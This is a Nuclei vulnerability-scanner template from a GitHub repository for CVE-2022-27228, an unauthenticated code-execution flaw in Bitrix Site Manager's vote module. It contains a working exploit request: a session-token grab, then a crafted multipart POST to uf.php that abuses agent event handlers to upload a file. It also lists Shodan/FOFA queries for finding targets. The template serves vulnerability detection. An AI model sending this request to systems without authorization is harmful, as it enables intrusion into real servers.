nuclei-templates/http/cves/2022/CVE-2022-27228.yaml at f6e4e3064d36c8668edc1d696e87234bd6f062f4 · projectdiscovery/nuclei-templates · GitHub

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
id: CVE-2022-27228

info:
  name: Bitrix Site Manager - Remote Code Execution
  author: theamanrawat
  severity: critical
  description: In the vote (aka "Polls, Votes") module before 21.0.100 of Bitrix Site Manager, a remote unauthenticated attacker can execute arbitrary code.
  impact: Unauthenticated attackers can execute arbitrary code remotely, potentially leading to full system compromise.
  remediation: Update to version 21.0.100 or later.
  reference:
    - https://alt3r.eg0.ru/p0c5/attacking_bitrix.pdf
    - https://pentestnotes.ru/notes/bitrix_pentest_full/#rce-vote_agentphp-cve-2022-27228
    - https://nvd.nist.gov/vuln/detail/CVE-2022-27228
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2022-27228
    cwe-id: CWE-20
    epss-score: 0.79027
    epss-percentile: 0.99012
    cpe: cpe:2.3:a:bitrix24:bitrix24:*:*:*:*:*:*:*:*
  metadata:
    verified: false
    vendor: bitrix24
    product: bitrix24
    shodan-query: "/bitrix/p3p.xml"
    fofa-query: body="/bitrix/"
  tags: cve,cve2022,bitrix,file-upload,rce,intrusive,vkev

variables:
  filename: "{{to_lower(rand_text_alpha(5))}}"
  marker: "{{randstr}}"

flow: http(1) && http(2)

http:
  - raw:
      - |
        GET /bitrix/admin/ HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - "contains(body, 'bitrix_sessid')"
        internal: true

    extractors:
      - type: regex
        group: 1
        name: session_id
        regex:
          - "'bitrix_sessid':'(.*?)'"
        internal: true

  - raw:
      - |
        POST /bitrix/tools/vote/uf.php?attachId[ENTITY_TYPE]=CFileUploader&attachId[ENTITY_ID][events][onFileIsStarted][]=CAllAgent&attachId[ENTITY_ID][events][onFileIsStarted][]=Update&attachId[MODULE_ID]=vote&action=vote HTTP/1.1
        Host: {{Hostname}}
        Content-Type: multipart/form-data; boundary=---------------------------xxxxxxxxxxxx

        -----------------------------xxxxxxxxxxxx
        Content-Disposition: form-data; name="bxu_files[bitrix50][NAME]"

        {{filename}}.txt
        -----------------------------xxxxxxxxxxxx
        Content-Disposition: form-data; name="bxu_files[bitrix50][NAME]";filename="{{filename}}.jpg"
        Content-Type: image/jpeg

        {{marker}}
        -----------------------------xxxxxxxxxxxx
        Content-Disposition: form-data; name="bxu_info[packageIndex]"

        pIndex101
        -----------------------------xxxxxxxxxxxx
        Content-Disposition: form-data; name="bxu_info[mode]"

        upload
        -----------------------------xxxxxxxxxxxx
        Content-Disposition: form-data; name="sessid"

        {{session_id}}
        -----------------------------xxxxxxxxxxxx
        Content-Disposition: form-data; name="bxu_info[filesCount]"

        1
        -----------------------------xxxxxxxxxxxx--

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(body, "\"status\":\"done\"")'
        condition: and
# digest: 4a0a00473045022100de89b7a8f28c54257dd0d894f0a883ad5cbc2f0bf02efbe11614a341e972bc7c022043a838b4b4f569c3250896424413c58aa04440e710b4f5b7fe939ea7ad24861b:922c64590222798bb761d5b6d8e72950